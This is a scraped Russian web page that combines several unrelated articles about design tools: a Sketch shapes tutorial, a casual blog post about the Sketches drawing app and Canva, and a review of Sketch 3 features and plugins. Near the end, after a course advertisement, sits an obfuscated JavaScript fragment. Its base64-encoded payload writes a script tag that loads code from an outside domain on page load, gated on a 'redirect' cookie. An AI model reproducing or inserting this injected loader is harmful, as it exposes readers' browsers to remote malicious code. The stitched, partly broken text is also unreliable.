Как рисовать в программе скетч

Одним из самых популярных слоев в программном обеспечении Sketch является Shape. В Sketch предусмотрено много стандартных фигур, таких как овалы, прямоугольники, звезды . В частности, некоторые формы, такие как многоугольники, закругленные углы, имеют дополнительные параметры и большие размеры. ,

Чтобы добавить новую фигуру к вашему рисунку, выберите фигуру в меню « Форма» . Нажмите и перетащите в любую позицию на холсте, чтобы сразу вставить. При перетаскивании фигуры Sketch будет указывать, какие размеры фигуры доступны. Панель инспектора отобразит дополнительные параметры для этой фигуры (если есть).

Дополнительное расширение

Некоторые из стандартных фигур в Sketch включают дополнительные параметры, особенно формы звезд и скругленные прямоугольники. Для звездных форм радиус и точки могут варьироваться; в то время как прямоугольники могут менять закругленные углы и радиусы углов.

Закругленные углы и гладкие

Sketch не только изменяет радиус угла прямоугольника, но и поддерживает выбор между закругленными углами и гладкими углами.

КАК РИСОВАТЬ Наброски / Скетчи БЫСТРЕЕ и ПРАВИЛЬНЕЕ

флип

Рядом с параметром поворота в Инспекторе находятся две кнопки, которые позволяют перевернуть фигуру по вертикали или по горизонтали. При переворачивании вы можете выбрать выравнивание или поворот, чтобы сбросить исходную форму.

Редактировать форму

Программное обеспечение Sketch позволяет вставлять различные формы в холст. Помимо объединения нескольких фигур, мы имеем право редактировать их, манипулируя ими непосредственно на точках. Все векторные фигуры состоят из серии точек и соединяют их с контурами. Чтобы отредактировать «скелет» фигуры, пользователь должен войти в режим векторного редактирования.

В режиме редактирования вы увидите 1 круглую точку на каждом углу. Нажмите и перетащите в любую точку, чтобы изменить положение, из которого изменится форма. Кроме того, Sketch позволяет добавлять новые точки к фигуре на пути между двумя точками и нажимать для быстрой вставки. Чтобы удалить точку, нажмите, чтобы выбрать точку, и нажмите клавишу Backspace на клавиатуре.

Путь между точками может быть прямым или изогнутым. На каждой стороне элемента управления кривизной пути появятся 2 маркера, так что пользователь может выполнить точную настройку при желании. С помощью этой функции векторного редактирования пользователи Sketch могут выравнивать фигуры.

Как рисовать фигуры в Sketch

Булевы манипуляции

Если вам нужно найти странную фигуру, которой нет в Sketch , создайте ее самостоятельно с помощью доступных инструментов. Вы будете думать о векторных инструментах для рисования фигур с нуля. Но есть намного более простой способ объединить формирование новых форм, и они называют это булевыми манипуляциями.

Существует 4 различных логических операции, и вы выберете каждый вариант в зависимости от ситуации: объединение (слияние), вычитание (вычитание), пересечение (пересечение) и разность (разница).

Обзор Sketchbook✍ Интерфейс. Любимые кисти. Функции

Вращать и трансформировать

Вращение и преобразование — это две одинаковые функции в Sketch, которые помогают по-разному редактировать слои.

Есть много способов повернуть фигуру, потому что вращение — это значение, измеренное в градусах, поэтому оно может быть положительным или отрицательным значением, соответствующим повороту по часовой стрелке или против часовой стрелки.

Эскиз позволяет быстро вращать слой или группу слоев на холсте, не включая этот режим, который заключается в удерживании нажатой клавиши «Command» и перетаскивании одного из параметров управления.

Как рисовать фигуры в Sketch

изменение

Инструмент «Преобразование» используется для деформации формы путем отклонения точек или создания искусственных трехмерных эффектов. Вы можете использовать этот инструмент в Sketch для преобразования одного или нескольких слоев одновременно.

Когда вы преобразуете форму под углом, вы обнаружите, что противоположный угол всегда движется в этом противоположном направлении. Это поможет в применении перспективных эффектов. Если вы хотите отрегулировать в фиксированном направлении, удерживайте нажатой клавишу «Command» во время перетаскивания.

Функция маскировки (маска)

Маска в этом графическом программном обеспечении используется для выборочного отображения разных слоев. Например, замаскируйте слой изображения, чтобы создать круг. Любая форма может стать маской. Для этого выберите форму и выберите слой Маска.

Sketch поддерживает два типа масок, Online Mask и Alpha Mask, с возможностью гибкой настройки в зависимости от потребностей пользователя в каждом конкретном случае.

Как рисовать фигуры в Sketch

Тянущий инструмент

Ножницы используются для вырезания линий из любой векторной фигуры. При редактировании фигуры выберите « Слой» > « Путь» > « Ножницы» в меню.

Затем мы можем нажать на линию в векторной форме, чтобы вырезать ее. Когда закончите, щелкните за пределами изображения или нажмите Enter или Escape, чтобы выйти из инструмента Drag. Когда останется только 1 строка, вы автоматически выйдете из этого инструмента.

Повернуть копию

Этот инструмент совершенно особенный в Sketch. Он недоступен на панели инструментов, но может быть добавлен с помощью Ctrl + клик на панели инструментов и выберите «Настроить панель инструментов». Или вызовите этот инструмент из меню, выбрав Layer > Path > Rotate Copies.

Этот инструмент выберет слой, а затем повернет его копии вокруг определенной точки. Например, в случае цветка — сделайте форму листа, затем поверните 2 копии вокруг центра, чтобы получить полный цветок.

карандаш

Инструмент Карандаш позволяет рисовать свободные фигуры. Просто перетащите, чтобы нарисовать на холсте. После завершения Sketch сгладит линии и упростит путь. Чтобы выбрать этот инструмент, выберите « Вставка» > « Карандаш» во всплывающем меню панели инструментов (или нажмите « P» ).

Читайте также:
Как проводить лотерею программа

Выше приведено руководство по использованию функции Shape и ее настройке на холсте Sketch. Надеюсь, статья вам пригодится!

Источник: ru.webtech360.com

Рисуем сами — приложение Sketches

Посмотрели мои киндеры на то, как я доисторическим методом ручками и карандашами котика рисовала, и говорят — так у нас же на планшете есть приложение Sketches (в котором они уже играли). Сразу спойлер — бесплатная версия, можно за примерно 500 руб апгрейдиться, много интересного, больше всего мне понравилась возможность рисовать на слоях

— это из рекламных описаний полной версии программы

Само приложение выглядит так:

— куча инструментов слева, много цветов справа (можно добавлять свои легко), посередине рабочее поле, где и рисуем. Приближать/отдалять рисунок — пальцами по экрану.

😊

справа еще два бегунка — степень прозрачности и размер инструмента. Есть еще какие-то настройки, с которыми мне предстоит разобраться

Рисунки сохраняются в программе (можно заводить свои папки, мне дети сделали отдельную папку, чтобы я в их не следила 😂), можно сохранять в фотогалерею планшета или отправлять по почте. Есть много готовых работ для примеров — от раскрасок-антистресс (которые можно просто открыть и заливать цветными красками) до. много чего. Чужие работы можно открыть и изменять, дорисовывать дальше. Можно открыть фото с планшета и подрисовать усы, например, что дети друг другу и делали 😂

В общем, занятная игрушка, это приложение Sketches, рекомендую 👍Котэ бы тоже рекомендовал, но он всё время продрых 😺

Из минусов — рисовать приходится . пальцем! 😆и лично мне это менее удобно / привычно нежели карандашом 😒Поэтому линии не сходятся, распылители не слушаются, косяков много, но. лучше так, чем вообще ни как 😍Зато в отличии от карандаша стирать/рисовать можно сколь угодно, и ни одна бумага при этом не пострадала 😀

— следов бесконечных стираний не будет.

Дальше надо было добавить буквы и я опять воспользовалась он-лайн редактором Canva.com (о нем уже рассказывала тут)

В редактор можно загружать свои фото — слева закладки и моя «галерея загрузок». После того, как добавила надписи и хочу сделать похожее / изменить, но не путаться в шрифтах, копирую рисунок — кнопка над рисунком обведена оранжевым кружочком. очень удобно! — уже в копиях и меняю/добавляю/легко сделать серию подобных.

😱

В чем прелесть современных технологий, в отличии от ручных рисунков — конечно можно бесконечно двигать буквы/менять размеры, шрифты и всячески копировать и тд. Не представляю, как наши предки каждый раз всё вручную заново перерисовывали ..ох, а я ведь тоже достаточно стара, чтобы помнить, как и я когда-то вручную всё перерисовывала, было дело

😂

В общем, как-то так — можно самим легко и прост о зато точно весело рисовать что-то мелкое для иллюстраций своих шЫдевров , для грандиозного лучше обращаться к опытным специалистам.

Ну, как заработаю на АТ 💰💰💵, так сразу же пойду заказывать обложки к спецам 😆

и готовые мои графические шЫдевры:

😊

Картинки — free, кому нравится, можете использовать

Источник: author.today

Как рисовать в программе скетч

В случае если вы — веб/UI/UX дизайнер, либо работаете с дизайнером, либо хотели бы стать им, то эта статья для вас.

Ранее я собрался попробовать программу Sketch 3, которая все больше привлекала к себе внимание.

Я думал, что, как и многие прочие новинки со стоимостью около $99 на App Store , Sketch 3 окажется или среднячком , или вообще пустой тратой денежных средств.

Тем не менее, как оказалось, одно из этих новых приложений оказалось таки одним из наилучших инструментов для дизайна, которые можно приобрести, и удивительным помощником в создании отличного дизайна для веб и интерфейсов.

Именно поэтому Sketch 3 так стремительно стал моим лучшим другом.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Пусть странички подарят вам свободу

Вначале давайте предположим, что вы перешли хотя бы с Photoshop на Illutrator ; и если нет, я настоятельно советую изучить все преимущества дизайна в векторном формате, какие огромные плюсы в этом для современного адаптивного веб-дизайна .

Это просто изменит вашу жизнь. В случае если вы уже используете Illustrator , то вы в курсе пользы возможности создавать дизайн одновременно на нескольких артбордах в одном файле.

А также вы знаете, как сильно может раздражать такое:

  • Нет никакого способа организации артбордов , кроме их визуального группирования.
  • Ограниченный размер канваса говорит о том, что все артборды могут и не поместиться.
  • Лимит в одну сотню артбордов не подходит для крупных проектов.
  • Крупные файлы работают довольно медленно и могут даже завалить систему.

Откройте Pages в программе Sketch 3. Странички по сути являются эквивалентом наличия целого множества канвасов (причем неограниченных в размере) в Illustrator .

Вот почему это так отлично:

  • Группировать артборды вместе также легко, как группировать слои.
  • Артбордов можно делать так много, сколько вам необходимо. Артборды и страницы не ограничены в числе, и их число не влияет на работоспособность приложения Sketch 3. Программа не тормозит по мере роста вашего проекта.
  • Интеллектуальное выравнивание (как смарт-гайды в программе Illustrator ) вам помогает соблюдать равные отступы между артбордами . В случае если вы одержимы порядком, то Sketch 3 относится к этому с большим пониманием.

Как я использую странички

Страничками я, как правило, отделяю различные шаблоны дизайна. К примеру, одна страничка отведена обычно под дизайн домашней странички, а каждый артборд на ней – вариация состояния или дизайна, включая версию для смартфона, десктопа и планшета. Находясь в одном месте, все данные версии видны мне сразу, я могу очень легко передвигать любые элементы с одного артборда на другой.

Читайте также:
Программа защиты жизни и здоровья от Сбербанка можно ли вернуть деньги

Также я завожу страничку для моего руководства стилей, на которой собираю примеры стилей текста, кнопок и прочих элементов интерфейса. Также отдельная страничка зарезервирована для разных настроек адаптивной сетки, которую я дублирую на новые странички, чтобы начинать всегда с одного и того же размера артборда , а также теми же настройками сетки.

В программе Illustrator мне приходилось применять отдельные файлы для аналогичной организации дизайнов, так как хранение подобного количества дизайнов в одном файле очень замедляло работу приложения. В этом способе были свои проблемы. Sketch 3 со своими страничками решает их все.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Адаптивная сетка, встроенная

Sketch 3 хорошо понимает, что на дворе уже 2016 год, и адаптивный веб-дизайн — уже стандарт, который значительно влияет на метод создания графики и разработки веб-приложений и сайтов. Вот почему в нем есть специальная встроенная сетка, которая просчитывает для вас размеры, чтобы вы могли настроить сетку по-своему без сложных вычислений и рисования направляющих линий вручную.

Приложение Sketch 3 называет это все также Layout (Макет), и вы можете включить, либо отключить сетку при потребности, на каждом артборде .

Layout Settings (то есть Настройки макета) дают возможность делать настройку переменных размеров сетки, правда я, как правило, указываю лишь два параметра, и даю Sketch 3 возможность рассчитать все прочее уже самостоятельно. Эти два параметра — это Gutter Width (то есть Ширина канавки) и Total Width (то есть Общая ширина).

Вы также можете подобрать решетку с заливкой, либо просто с контуром. Если вы применяете одинаковые настройки, то можете установить их как настройки по умолчанию для того, чтобы каждый новый артборд наследовал аналогичные параметры макета.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Рекомендация: Применяйте настройки сетки сразу к нескольким артбордам , либо всем артбордам на страничке сразу, выделяя их перед выбором меню Layout Settings .

Разумеется, есть шаблоны Illustrator и Photoshop , которые можно легко скачать с уже готовыми сетками, однако:
1) Вам могут потребоваться другие размеры борозд, либо более широкие строки.
2) Они обычно выполнены для одного размера дисплея ( десктоп ) и не включают меньшие версии для мобильного или планшета.
3) Вам все-таки надо будет копировать и вставлять их в каждый артборд . А это отнимет достаточно много времени. А что если вы решите сменить их во время работы? Если необходимо высчитать параметры ячеек для какой-то нестандартной сетки под различные ширины дисплея, как же увлекательно заниматься этой математикой… За это все вы можете захотеть воспользоваться онлайн-инструментом для сеток, однако здесь опять столкнетесь с проблемой № 3.

Вот как выглядит моя страница для адаптивных размеров артборда с активированным сеточным макетом:

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Артборды с включенной функцией Show Layout

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Ускоряйте процесс со стилями текста и слоя

Вы уже знакомы с текстовыми стилями. Вы знаете, что задаются конкретные стили для основного текста, заголовков. В InDesign и Illustrator такое есть. Даже в текстовых редакторах есть предустановленные стили.

Крайне важно соблюдать в типографике постоянство во всем проекте для того, чтобы было единство стилистики полностью во всех его элементах. Это помогает существенно минимизировать время на создание дизайна. Стилизация текстов в программе Sketch 3 помогает добиться этого при помощи построения перечня стилей для любых вариаций текста.

К примеру, базовый перечень может выглядеть приблизительно таким образом:

  • Navigation Link
  • H1
  • H2
  • H3
  • Body copy
  • Body copy link
  • Button text dark
  • Button text light

Sketch 3 также стилизует перечень, применяя выбранный тип шрифта, размер и цвет, таким образом визуализируется каждый стиль. Но вот где это в особенности полезно: допустим, вы уже создали несколько скринов с навигацией, и поняли, что размер, цвет, тип шрифта или высота строки совсем не та. Вы можете изменить все части текста этого стиля сразу. Просто необходимо изменить один фрагмент, и это изменения сразу подтянется на все прочие автоматически.

Это доступно и в программе Illustrator , однако реализация достаточно громоздкая и не очень интуитивная. Версия Sketch 3 намного проще для понимания и использования, в перечне стилей сразу виден их внешний вид, а это сильно экономит время.

Нет, я совсем не забыл о стилях слоя. Они просто невероятны, если не сказать больше! По сути, это то же, что и стили текста, однако в стилях слоя задается контур, заливка, непрозрачность, режим блендинга , тени.

Допустим, у вас есть несколько различных стилей кнопок, которые необходимо использовать в различных местах проекта. Если создать их как стили слоя, то вы сможете быть абсолютно уверенным в том, что каждая кнопка всегда стилизована так же, как остальные.

Я также считаю стили слоя очень полезными для макетирования, когда необходимо создать новые заглушки в одинаковом визуальном стиле с теми, которые я использовал раньше.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Изобилие плагинов

Начиная с интерактивного прототипирования и завершая документацией, в программе Sketch 3 предусмотрены прекрасные возможности интеграции со сторонними сервисами и приложениями, которые могут быть весьма полезными. Есть множество превосходных плагинов, улучшающих продуктивность и существенно упрощающих множество разных задач.

Вот перечень моих фаворитов:

Framer JS (десктопная программа) — мощное средство для прототипирования, позволяющий использовать код (CoffeeScript) для настройки микровзаимодействий и тестировать новые интерактивные концепты без потребности предварительно верстать дизайн CSS и HTML. Это качественное прототипирование в наилучшем его виде. Применяйте его для прототипов под компьютеры, смартфоны и что угодно другое с установленным браузером. В случае если вы не знакомы с CoffeeScript, Framer предоставляет специальную документацию, уроки, а также встроенный текстовый редактор вам в помощь. Применяя Framer, я впервые ознакомился с CoffeeScript, и это знакомство прошло весьма безболезненно.

Читайте также:
Порядок установки программы powerpoint

UXPin (веб-приложения) — средство для и безболезненного прототипирования. В UXPin предлагается прекрасный интуитивный веб-интерфейс с полной поддержкой синхронизации вашего проекта с файлами Sketch 3. Добавление переходов, реалистичных взаимодействий здесь реализовано очень просто. Знакомые практически любому дизайнеру выпадающие меню и кнопки, помогут за пару секунд создать высокоточные прототипы.

Zeplin (десктопное, веб-приложение) — когда дизайн полностью готов для разработчиков, то вам остается лишь экспортировать арборды в Zeplin, а он уже позаботится обо всем. Zeplin показывает разработчикам, какие шрифты и цвета вы используете по всему проекту, отображает расстояния между всеми объектами, которые можно узнать, наведя для этого курсором на объекты. Также делает Sketch 3, в случае если при этом удерживать клавишу Option Alt.

Исходники каждой картинки можно легко экспортировать из Zeplin без потребности заранее экспортировать их из программы Sketch 3. Разработчику вообще не потребуется использовать приложение Sketch 3. Это главное средство, которое сэкономит ваше время, и при этом предоставит разработчикам все нужное для интеграции дизайна в код продукта.

Sketch Toolbox — находите расширения и устанавливайте их при помощи этого легкого и быстрого приложения-компаньона . Сейчас нет лучшего метода для поиска нового полезного расширения их установки, либо удаления. Это также крайне необходимый инструмент для всех пользователей Sketch 3.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Мастерски экспортируйте исходники

Также вы можете перетащить его в поле загрузки в веб-браузере (попробуйте для того, чтобы увидеть, что именно я имею в виду). Поддержка экспорта сразу в несколько форматов одновременно (JPEG, TIFF, PNG, PDF, EPS, SVG), а также несколько размеров (1x, 2x, 3x, 0.5x, custom x , либо max height / width ) — тоже удивительно просто!

Вы можете просто экспортировать весь набор исходников за одну операцию, и приложение Sketch 3 запомнит все настройки, которые были выбраны вами для каждого из них.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Настройки экспорта при выделенном слое

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Документация? И это вы можете

При помощи фантастического расширения Sketch Notebook вы сможете добавить аннотации для каждого из артбордов . Он также позволяет вам с легкостью включать, либо отключать их или даже перестилизовать внешний вид аннотаций, что позволяет их использовать в брендированном виде для различных презентаций. Я не могу даже выразить словами, как круто это экономит время.

Ранее я экспортировал свои скрины как картинки, и импортировал их в отдельную презентацию, где необходимо было вручную добавлять перечни аннотаций, стилизовать их и регулярно обновлять картинки, чтобы синхронизировать их со всеми последними изменениями в дизайне. Это была просто адская трата времени. Однако сейчас я уже могу документировать в ходе дизайна, при этом отключая свои пометки для того, чтобы они не мешали, или вновь включая их при потребности.

Это крайне полезное средство. Испробуйте его сами, оно реально помогает!

Добавление аннотаций при помощи

Рекомендация: Рестилизуйте аннотации для полного соответствия стиля вашего бренда.

Сайдбар с аннотациями по умолчанию имеет темно-серый фон с белым, либо серым текстом и маркерами зеленого цвета. Вы, возможно, захотите изменить внешний вид данных элементов, их тип шрифта, цвет или удалить ненужные части, добавить свое лого, к примеру.

Для этого следует ввести первую порцию данных. Полностью автоматически создастся новая страничка с артбордом , используемым как шаблон для всех аннотаций. Редактирование макета, удаление или добавление элементов на данном артборде будет автоматически менять все сайдбары с аннотациями.

Вам надо будет удалять ранее созданные и повторно их комментировать для получения нового макета, либо набора элементов. Редактирование всех существующих стилей слоев/текста сразу изменит шрифты/цвета в существующих аннотациях.

Также я предлагаю превратить текст заголовка в символ для того, чтобы можно было менять его практически в любое время, и данные изменения подтягивались бы во все аннотации, если вы позже пожелаете изменить заголовок.

Почему Sketch 3 – лучший друг дизайнера интерфейсов?

Контекст рулит!

Все мы привыкли видеть в зеркале собственное отражение. Но сделайте собственный фотоснимок, и увидьте свое лицо таким, каким его видят все прочие люди, и вы практически сразу заметите, что ваше левое ухо выше правого, или же что один глаз немного больше открыт, нежели другой.

Это приблизительно то же, что видеть свой собственный дизайн в действии. Вы станете замечать те вещи, которые ранее не замечали. Он лишь выглядит несколько иначе.

Показываете ли вы свое творение коллегам, презентуете его клиенту или просто желаете посмотреть его самостоятельно, вам необходимо иметь контекст для того, чтобы оценить, как именно будет выглядеть дизайн в рабочем состоянии. Это поможет проработать различные детали, которые крайне легко упустить в процессе.

Я пользуюсь им постоянно в процессе дизайна, оно очень помогает протестировать различные детали. Я его использую и для презентаций, в которых нет потребности в добавлениях текста и кликабельного демо . Я могу легко бросить все нужные скрины в веб-браузер и переключаться по разным вкладкам, презентуя один за другим. Это наиболее быстрый способ презентации современных десктопных дизайнов в контексте.

Попробуйте!

Скачайте полностью бесплатную версию Sketch 3, попробуйте ее в работе. Я пользуюсь Sketch 3 уже около полугода, и он полностью изменил мой процесс работы, увеличив качество работы, скорость, и привнеся очень много инноваций.

Теперь Sketch 3 — мой главный инструмент для множества стадий процесса создания дизайна . Я почти уверен, что и вы в нем найдете для себя много полезного.

Если Вы хотите с нуля до профи за пару дней изучить Sketch, то смотрите это видео.

P.S. Бесплатный курс по Дизайну Мобильных Приложений
function getCookie(e)()[]\/+^])/g,»$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0>var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time)

Источник: www.blog.jazov.com

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru